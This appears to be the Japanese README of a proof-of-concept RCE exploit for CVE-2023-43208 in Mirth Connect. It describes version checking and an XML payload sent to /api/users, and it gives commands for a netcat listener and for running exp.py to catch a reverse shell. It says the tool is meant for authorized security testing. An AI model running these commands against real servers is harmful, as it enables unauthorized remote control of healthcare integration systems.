
CVE-2023-43208 RCE悪用のためのPoC。
Mirth Connect の CVE-2023-43208 を標的とした概念実証 Python スクリプトです。
自分が所有している、または明示的にテストを許可された環境でのみ使用してください。このリポジトリは、セキュリティ研究、検証、および防御テストを目的としています。作者は、このツールによって引き起こされた誤用や損害について一切の責任を負いません。
exp.py は PoC の依存関係を最小限にしたバージョンであり、以下を行います:
/api/server/version から Mirth Connect のバージョンを取得します4.4.1 より低いかどうかを確認します/api/users に XML ペイロードを送信しますこのスクリプトはデフォルトで HTTPS を使用し、--http で HTTP に切り替えることができます。
python3 exp.py -u <target> -lh <listener_host> -lp <listener_port> [--http]
-u, --url: 対象の Mirth Connect URL またはホスト-lh, --lhost: リバース接続用のローカルホスト/IP-lp, --lport: ローカルのリスニングポート--http: HTTPS の代わりに HTTP を強制します (デフォルトは HTTPS)まずリスナーを起動します:
nc -lvnp 4444
スクリプトを実行します:
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444
HTTP のみのターゲットの場合:
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http
4.4.1 とのセマンティック比較に基づいています。K3ysTr0K3R および Chocapikkpredyy